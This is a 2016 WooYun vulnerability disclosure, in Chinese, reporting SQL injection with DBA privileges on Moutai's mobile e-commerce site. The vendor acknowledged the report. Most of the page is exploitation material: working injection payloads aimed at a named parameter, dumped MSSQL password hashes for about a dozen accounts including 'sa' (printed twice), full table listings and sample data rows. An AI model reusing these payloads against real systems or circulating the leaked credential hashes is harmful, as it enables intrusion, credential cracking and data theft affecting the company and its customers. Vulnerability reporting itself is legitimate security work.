当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191800

漏洞标题:茅台电商某站存在sql注入dba权限&&1500个表&&多达1000多万数据泄露&&hash已经抓取

相关厂商:emaotai.cn

漏洞作者: 猪猪虾

提交时间:2016-04-02 15:10

修复时间:2016-05-20 17:30

公开时间:2016-05-20 17:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-02: 细节已通知厂商并且等待厂商处理中
2016-04-05: 厂商已经确认,细节仅向厂商公开
2016-04-15: 细节向核心白帽子及相关领域专家公开
2016-04-25: 细节向普通白帽子公开
2016-05-05: 细节向实习白帽子公开
2016-05-20: 细节向公众公开

简要描述:

茅台电商某站存在sql注入dba权限&&影响1500个表&&多达1000多万数据泄露&&hash已经抓取
好久没有首页了

详细说明:

注入点:http://3g.emaotai.cn/
payload:

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: categoryId=&keyWord=dsafs')) AS NdHA WHERE 1215=1215 AND 5075=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(
112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5075=5075) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(120)+
CHAR(113)+CHAR(113)))--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: categoryId=&keyWord=dsafs')) AS pxTB WHERE 9796=9796;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: categoryId=&keyWord=dsafs')) AS jHDe WHERE 2949=2949 WAITFOR DELAY '0:0:5'--


database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x01003e97c513ec67adfd1aa7814c771927d74dc4e85a76d94223
        header: 0x0100
        salt: 3e97c513
        mixedcase: ec67adfd1aa7814c771927d74dc4e85a76d94223
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x0100164d8137ff729a1dd4b185672857e14f1e88181c41a58d96
        header: 0x0100
        salt: 164d8137
        mixedcase: ff729a1dd4b185672857e14f1e88181c41a58d96
[*] actuser [1]:
    password hash: 0x01002c559e1ef0fec7c5d24e76631883cd927493644273a3a055
        header: 0x0100
        salt: 2c559e1e
        mixedcase: f0fec7c5d24e76631883cd927493644273a3a055
[*] bmDev [1]:
    password hash: 0x0100e6136a12ed038825071d087cd980e14a78680f03f8b7436b
        header: 0x0100
        salt: e6136a12
        mixedcase: ed038825071d087cd980e14a78680f03f8b7436b
[*] dev [1]:
    password hash: 0x01008cbd6f966933555d0351e2b9ab215594046ed48fe3074857
        header: 0x0100
        salt: 8cbd6f96
        mixedcase: 6933555d0351e2b9ab215594046ed48fe3074857
[*] distributor_admin [1]:
    password hash: 0x0100a4566f08a461a165d4f8f09e3476b4dbf93ef7ea8c69ac31
        header: 0x0100
        salt: a4566f08
        mixedcase: a461a165d4f8f09e3476b4dbf93ef7ea8c69ac31
[*] hishop [1]:
    password hash: 0x01000f16b31f83f4cc8dfd2eb5a668a787774483d5e18a4307ce
        header: 0x0100
        salt: 0f16b31f
        mixedcase: 83f4cc8dfd2eb5a668a787774483d5e18a4307ce
[*] hishop_pj [1]:
    password hash: 0x010002b323b86a30a4cff937a75c1ff146e337ebb7435aec6e30
        header: 0x0100
        salt: 02b323b8
        mixedcase: 6a30a4cff937a75c1ff146e337ebb7435aec6e30
[*] moutaiwssc [1]:
    password hash: 0x010034bd734767f33228aa8c59ce87c3a6dae24fc111352e2dc5
        header: 0x0100
        salt: 34bd7347
        mixedcase: 67f33228aa8c59ce87c3a6dae24fc111352e2dc5
[*] mysys [1]:
    password hash: 0x0100ab29481a1f1ff3abde88cd9be148b78d57d0990e9268fd80
        header: 0x0100
        salt: ab29481a
        mixedcase: 1f1ff3abde88cd9be148b78d57d0990e9268fd80
[*] sa [1]:
    password hash: 0x01006248941a8f751a26c0190421678951e550c751ba6c19cf4d
        header: 0x0100
        salt: 6248941a
        mixedcase: 8f751a26c0190421678951e550c751ba6c19cf4d
[*] taxreader [1]:
    password hash: 0x010010fb494c7338dcaf32c50a33da57a5b95a8b7836c288e5f3
        header: 0x0100
        salt: 10fb494c
        mixedcase: 7338dcaf32c50a33da57a5b95a8b7836c288e5f3
[*] TicketReader [1]:
    password hash: 0x01000a9631218adcdcf9a327ed76cbf00e4b792779396b7497fb
        header: 0x0100
        salt: 0a963121
        mixedcase: 8adcdcf9a327ed76cbf00e4b792779396b7497fb
Database: drpecosdl
[237 tables]
+-----------------------------------------------------------+
| ECOModelRoot                                              |
| ECO_ORMAPPING                                             |
| ECO_TABLES                                                |
| ECO_TYPE                                                  |
| ECO_TYPE_BAK                                              |
| SolarData                                                 |
| dtproperties                                              |
| labeng                                                    |
| pangolin_test_table                                       |
| pass_found                                                |
| sysdiagrams                                               |
| t_Sys_tip                                                 |
| t_bank_translog                                           |
| t_chat_msg                                                |
| t_chat_users                                              |
| t_ckgl_ckbgy                                              |
| t_ckgl_ckdm                                               |
| t_ckgl_ckspml                                             |
| t_ckgl_spdb                                               |
| t_ckgl_spdbmx                                             |
| t_ckgl_tzml                                               |
| t_config_client_commited                                  |
| t_config_client_datacommit                                |
| t_config_mail_distribute                                  |
| t_config_maillog                                          |
| t_config_recover                                          |
| t_crm_lddj                                                |
| t_crm_member                                              |
| t_cwgl_xspz                                               |
| t_cx_Rpt                                                  |
| t_cx_backup                                               |
| t_cx_sql                                                  |
| t_dzsw_notice                                             |
| t_dzsw_notice_class                                       |
| t_dzsw_notice_image                                       |
| t_gggl_bfjh                                               |
| t_hdgl_cjhy                                               |
| t_hdgl_hd                                                 |
| t_hdgl_hyjl                                               |
| t_hdgl_tmxx                                               |
| t_hdgl_wdjl                                               |
| t_hdgl_wqb                                                |
| t_hdgl_wqtm                                               |
| t_hdgl_zjhy                                               |
| t_hishop_Region                                           |
| t_hishop_Region_bak                                       |
| t_hygl_jfbz                                               |
| t_khgl_ghxe                                               |
| t_khgl_jlr                                                |
| t_khgl_khda                                               |
| t_khgl_khfk                                               |
| t_khgl_khfw                                               |
| t_khgl_khgmyx                                             |
| t_khgl_khps                                               |
| t_khgl_khpsmxb                                            |
| t_khgl_lxr                                                |
| t_khgl_spsc                                               |
| t_khgl_wlz                                                |
| t_khgl_ysz                                                |
| t_khgl_zkl                                                |
| t_mailtest_yxwd                                           |
| t_pos_ckd                                                 |
| t_pos_ckd_hc                                              |
| t_pos_ckdmx                                               |
| t_pos_ghdd                                                |
| t_pos_ghdd_bak                                            |
| t_pos_ghdd_sdl                                            |
| t_pos_ghdd_test                                           |
| t_pos_ghddmx                                              |
| t_pos_ghddmx_sdl                                          |
| t_pos_ghddmx_test                                         |
| t_pos_kcpcb                                               |
| t_pos_kcpcmxb                                             |
| t_pos_kctz                                                |
| t_pos_kctz_hc                                             |
| t_pos_ndzz                                                |
| t_pos_ndzzbt                                              |
| t_pos_rkd                                                 |
| t_pos_rkd_hc                                              |
| t_pos_rkdmx                                               |
| t_pos_rkdmx_hc                                            |
| t_pos_tuangou                                             |
| t_pos_xsd                                                 |
| t_pos_xsdmx                                               |
| t_pos_yxwd                                                |
| t_pos_yxwd_head                                           |
| t_pos_yxwd_old                                            |
| t_rpt_mnddhq                                              |
| t_rpt_mnpzhq                                              |
| t_rpt_mrddhq                                              |
| t_rpt_mrpzhq                                              |
| t_rpt_myddhq                                              |
| t_rpt_mypzhq                                              |
| t_shop_adConfig                                           |
| t_shop_cpzx                                               |
| t_shop_djsq                                               |
| t_shop_djsqmxb                                            |
| t_shop_doc                                                |
| t_shop_dxxmb                                              |
| t_shop_fdxx                                               |
| t_shop_gift                                               |
| t_shop_hkjs                                               |
| t_shop_hkjsmxb                                            |
| t_shop_jfb                                                |
| t_shop_jfbz                                               |
| t_shop_sjbz                                               |
| t_shop_spjg                                               |
| t_shop_spml                                               |
| t_shop_spml_hishop_tmp                                    |
| t_shop_spxe                                               |
| t_sys_Columdef                                            |
| t_sys_Form                                                |
| t_sys_FormGridParams                                      |
| t_sys_FormStoredClass                                     |
| t_sys_StoreProc                                           |
| t_sys_backup                                              |
| t_sys_codelib                                             |
| t_sys_download                                            |
| t_sys_dwbdjlb                                             |
| t_sys_dwmlb                                               |
| t_sys_fielddef                                            |
| t_sys_formStatus                                          |
| t_sys_formlinks                                           |
| t_sys_grid                                                |
| t_sys_help                                                |
| t_sys_help_chm                                            |
| t_sys_help_chm1                                           |
| t_sys_htmltemplate                                        |
| t_sys_images                                              |
| t_sys_logs                                                |
| t_sys_logs_bak                                            |
| t_sys_menu                                                |
| t_sys_menu_permit                                         |
| t_sys_menu_requests                                       |
| t_sys_menuuser                                            |
| t_sys_message                                             |
| t_sys_msg                                                 |
| t_sys_newkey                                              |
| t_sys_notice                                              |
| t_sys_project                                             |
| t_sys_queue                                               |
| t_sys_requirement                                         |
| t_sys_rpt                                                 |
| t_sys_rptjoin                                             |
| t_sys_rtptables                                           |
| t_sys_siteinfo                                            |
| t_sys_spml                                                |
| t_sys_subject                                             |
| t_sys_subject_relation                                    |
| t_sys_suggestion                                          |
| t_sys_tabledef                                            |
| t_sys_ticket                                              |
| t_sys_ticket_sub                                          |
| t_sys_ticketsn_user                                       |
| t_sys_workflow                                            |
| t_test_odata                                              |
| t_wlgl_flflb                                              |
| t_wlgl_psqy                                               |
| t_wlgl_ptwldwbm                                           |
| t_wlgl_spflb                                              |
| t_wlgl_wldwbm                                             |
| t_wlgl_yzflb                                              |
| t_wlgl_yzfqb                                              |
| t_wlgl_yzfqsfb                                            |
| t_wlgl_yzzfb                                              |
| t_wlgl_zfbzb                                              |
| t_xtgl_czjsb                                              |
| t_xtgl_czjsb_bak                                          |
| t_xtgl_czjsb_moutai                                       |
| t_xtgl_czjsb_new_bak                                      |
| t_xtgl_czry                                               |
| t_xtgl_czry_bak                                           |
| t_xtgl_czry_bakzjj                                        |
| t_xtgl_czry_moutai                                        |
| t_xtgl_czryjs                                             |
| t_xtgl_czryjs_bak                                         |
| t_xtgl_czryjs_moutai                                      |
| t_xtgl_czryqx_moutai                                      |
| t_xtgl_dm                                                 |
| t_xtgl_dm_1                                               |
| t_xtgl_dm_bak                                             |
| t_xtgl_dm_bak2                                            |
| t_xtgl_dwbmb                                              |
| t_xtgl_dwhsb                                              |
| t_xtgl_jsgsb                                              |
| t_xtgl_jsqx                                               |
| t_xtgl_jsqx_bak                                           |
| t_xtgl_jsqx_moutai                                        |
| t_xtgl_rjmkbmb                                            |
| t_xtgl_rjmkbmb_bak                                        |
| t_xtgl_rjmkbmb_moutai                                     |
| t_xtgl_spjg                                               |
| t_xtgl_spjg_moutai                                        |
| t_xtgl_spml                                               |
| t_xtgl_spml_moutai                                        |
| t_xtgl_spml_old                                           |
| t_xtgl_spmlkp                                             |
| t_xtgl_xzqh                                               |
| t_xtgl_xzqh_bak                                           |
| t_xtgl_xzqh_new_bak                                       |
| t_xtgl_xzsf                                               |
| t_yxwdgl_yxwd                                             |
| t_yxwdgl_yxwd_moutai                                      |
| t_ztpzcs_extscript                                        |
| t_ztpzcs_tablist                                          |
| t_ztpzgl_pzcs                                             |
| t_ztpzgl_pzcs_bak                                         |
| tb_gh_spml                                                |
| tb_gh_th                                                  |
| tb_order_item                                             |
| tb_order_shipping                                         |
| tmp                                                       |
| tmp_region                                                |
| tmp_xsd                                                   |
| tmp_xsdid                                                 |
| tmp_xsdt                                                  |
| v_b2b_order                                               |
| v_b2b_order_detail                                        |
| v_crm_member                                              |
| v_crm_member_birthday                                     |
| v_khgl_jlr                                                |
| v_khgl_khpj                                               |
| v_pos_kctz_for_recovery                                   |
| v_pos_pz                                                  |
| v_pos_xsflz                                               |
| v_price_spml                                              |
| v_rpt_kdxx                                                |
| v_tax_pos_ghdd                                            |
| v_tax_pos_ghddmx                                          |
| v_tax_shop_spml                                           |
| v_xtgl_spjg                                               |
| v_xtgl_splb                                               |
| v_xtgl_spml                                               |
| v_xtgl_xzqh                                               |
| v_xtgl_xzsf                                               |
| v_yxwdgl_yxwd                                             |
| xzqh2006                                                  |
+-----------------------------------------------------------+
Database: tempdb
[86 tables]
+-----------------------------------------------------------+
| MSdistributor_access                                      |
| #018335C9                                                 |
| #02775A02                                                 |
| #02C075A4                                                 |
| #02E830D1                                                 |
| #05A4A1EB                                                 |
| #07852AC1                                                 |
| #07C1F487                                                 |
| #08794EFA                                                 |
| #08A10A27                                                 |
| #08B618C0                                                 |
| #09952E60                                                 |
| #09CA388A                                                 |
| #0EC4C328                                                 |
| #108C44B2                                                 |
| #118068EB                                                 |
| #1550F9CF                                                 |
| #1A15AEEC                                                 |
| #1DE63FD0                                                 |
| #1E698D3A                                                 |
| #1F5A524D                                                 |
| #1F5DB173                                                 |
| #20FD77D0                                                 |
| #21B6D0B4                                                 |
| #223A1E1E                                                 |
| #23ADFED1                                                 |
| #24016DDE                                                 |
| #2429290B                                                 |
| #25083EAB                                                 |
| #26467BA7                                                 |
| #267B85D1                                                 |
| #273A9FE0                                                 |
| #2752DBD5                                                 |
| #2A170C8B                                                 |
| #2B60367F                                                 |
| #2C345F27                                                 |
| #2CF7A3B3                                                 |
| #2E74DAB0                                                 |
| #309B8396                                                 |
| #33B9AFDB                                                 |
| #3553B50D                                                 |
| #35EB13EF                                                 |
| #37353B04                                                 |
| #387E64F8                                                 |
| #405C1EBC                                                 |
| #4C371A65                                                 |
| #5007AB49                                                 |
| #53D83C2D                                                 |
| #55665317                                                 |
| #5A8539BC                                                 |
| #5B795DF5                                                 |
| #5C6D822E                                                 |
| #5D25A7F8                                                 |
| #603E1312                                                 |
| #60F638DC                                                 |
| #6132374B                                                 |
| #62265B84                                                 |
| #631A7FBD                                                 |
| #63FCF483                                                 |
| #64C6C9C0                                                 |
| #6995D248                                                 |
| #6A89F681                                                 |
| #6C321607                                                 |
| #6E2F6D12                                                 |
| #6F23914B                                                 |
| #6FA3B159                                                 |
| #70FE8AC0                                                 |
| #71C103F5                                                 |
| #72F4222F                                                 |
| #75A3444C                                                 |
| #76465B7D                                                 |
| #7973D530                                                 |
| #7A16EC61                                                 |
| #7B1F53DC                                                 |
| #7B840A99                                                 |
| #7C137815                                                 |
| #7C3B3342                                                 |
| #7D079C4E                                                 |
| #7D2F577B                                                 |
| #7D446614                                                 |
| #7D6C530B                                                 |
| #7DE77D45                                                 |
| #7DFBC087                                                 |
| #7E237BB4                                                 |
| #7F179FED                                                 |
| #7F549B7D                                                 |
+-----------------------------------------------------------+
Database: DrpEco
[309 tables]
+------------------------------------------
| ECOModelRoot
| ECO_ORMAPPING
| ECO_TABLES
| ECO_TYPE
| ECO_TYPE_BAK
| MSpeer_conflictdetectionconfigrequest
| MSpeer_conflictdetectionconfigresponse
| MSpeer_lsns
| MSpeer_originatorid_history
| MSpeer_request
| MSpeer_response
| MSpeer_topologyrequest
| MSpeer_topologyresponse
| MSpub_identity_range
| Sheet1$
| SolarData
| dirs
| dtproperties
| labeng
| pangolin_test_table
| pass_found
| sequence
| sysarticlecolumns
| sysarticles
| sysarticleupdates
| sysdiagrams


[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x01003e97c513ec67adfd1aa7814c771927d74dc4e85a76d94223
        header: 0x0100
        salt: 3e97c513
        mixedcase: ec67adfd1aa7814c771927d74dc4e85a76d94223
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x0100164d8137ff729a1dd4b185672857e14f1e88181c41a58d96
        header: 0x0100
        salt: 164d8137
        mixedcase: ff729a1dd4b185672857e14f1e88181c41a58d96
[*] actuser [1]:
    password hash: 0x01002c559e1ef0fec7c5d24e76631883cd927493644273a3a055
        header: 0x0100
        salt: 2c559e1e
        mixedcase: f0fec7c5d24e76631883cd927493644273a3a055
[*] bmDev [1]:
    password hash: 0x0100e6136a12ed038825071d087cd980e14a78680f03f8b7436b
        header: 0x0100
        salt: e6136a12
        mixedcase: ed038825071d087cd980e14a78680f03f8b7436b
[*] dev [1]:
    password hash: 0x01008cbd6f966933555d0351e2b9ab215594046ed48fe3074857
        header: 0x0100
        salt: 8cbd6f96
        mixedcase: 6933555d0351e2b9ab215594046ed48fe3074857
[*] distributor_admin [1]:
    password hash: 0x0100a4566f08a461a165d4f8f09e3476b4dbf93ef7ea8c69ac31
        header: 0x0100
        salt: a4566f08
        mixedcase: a461a165d4f8f09e3476b4dbf93ef7ea8c69ac31
[*] hishop [1]:
    password hash: 0x01000f16b31f83f4cc8dfd2eb5a668a787774483d5e18a4307ce
        header: 0x0100
        salt: 0f16b31f
        mixedcase: 83f4cc8dfd2eb5a668a787774483d5e18a4307ce
[*] hishop_pj [1]:
    password hash: 0x010002b323b86a30a4cff937a75c1ff146e337ebb7435aec6e30
        header: 0x0100
        salt: 02b323b8
        mixedcase: 6a30a4cff937a75c1ff146e337ebb7435aec6e30
[*] moutaiwssc [1]:
    password hash: 0x010034bd734767f33228aa8c59ce87c3a6dae24fc111352e2dc5
        header: 0x0100
        salt: 34bd7347
        mixedcase: 67f33228aa8c59ce87c3a6dae24fc111352e2dc5
[*] mysys [1]:
    password hash: 0x0100ab29481a1f1ff3abde88cd9be148b78d57d0990e9268fd80
        header: 0x0100
        salt: ab29481a
        mixedcase: 1f1ff3abde88cd9be148b78d57d0990e9268fd80
[*] sa [1]:
    password hash: 0x01006248941a8f751a26c0190421678951e550c751ba6c19cf4d
        header: 0x0100
        salt: 6248941a
        mixedcase: 8f751a26c0190421678951e550c751ba6c19cf4d
[*] taxreader [1]:
    password hash: 0x010010fb494c7338dcaf32c50a33da57a5b95a8b7836c288e5f3
        header: 0x0100
        salt: 10fb494c
        mixedcase: 7338dcaf32c50a33da57a5b95a8b7836c288e5f3
[*] TicketReader [1]:
    password hash: 0x01000a9631218adcdcf9a327ed76cbf00e4b792779396b7497fb
        header: 0x0100
        salt: 0a963121
        mixedcase: 8adcdcf9a327ed76cbf00e4b792779396b7497fb


sa的hash已经抓取!
大概1500个表 影响巨大!@

数据1.png


其中一个300多万数据!
权限足够大可dump所有数据库的数据!
+--------------------------------------+----------+
| ECO_ID | ECO_TYPE |
+--------------------------------------+----------+
| 00000251-938E-415E-AF4D-6FCD1C601C07 | 15 |
| 000004AD-4717-4431-A500-59A9DBAF729A | 15 |
| 000004AE-38DE-4E18-BB44-9D4D0F4AD6BC | 15 |
| 0000072D-8386-4645-BB36-72B5FBA47942 | 12 |
| 00000938-5521-4F85-A150-165936662197 | 23 |
| 00000B1D-D249-49B1-8BFC-7D814E857427 | 15 |
| 00000C0D-C41A-4386-9DEA-6D1573E5F0C3 | 15 |
| 00000D5E-A711-4FF0-A6BA-21A80F37DD0E | 15 |
| 00001509-4A78-4734-BAB3-F28D4DD72D74 | 12 |
| 00001900-C529-46B1-BC6E-B423B317E9C1 | 23 |
| 00001BBA-A975-4895-A32E-20ADE860ED57 | 15 |
| 00001BE6-C2D2-45C3-A2EC-CCE77F8D36B1 | 15 |
| 00001E38-9E69-4596-A1E2-D1F0221D97DA | 12 |
| 00001F6C-329F-45CF-9542-2D1F16C15628 | 23 |
| 00001F95-09EA-49D0-98BB-0536F8C4FC65 | 12 |
| 000020A6-3FCF-4A67-A91C-80D28EB78928 | 23 |
| 00002149-CC7C-4974-AFD2-9529B0800612 | 23 |
| 00002AFD-1A8A-4E11-9F10-544263099BE8 | 12 |
| 00002FA8-553F-4F8E-80F9-395494D58787 | 12 |
| 000031AD-9C01-482E-B565-E636901A60F4 | 6 |
| 000033B0-4AFA-49C0-AF19-6F265C8A345F | 12 |
| 000034AE-C1B5-4882-BA2B-ABDC20693499 | 12 |
| 0000353F-9C9B-458A-BA26-1113AABA6871 | 12 |

漏洞证明:

以上足以证明!友情检测

修复方案:

你们更专业!

版权声明:转载请注明来源 猪猪虾@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-04-05 17:28

厂商回复:

感谢您的反馈,我们将尽快修复。

最新状态:

暂无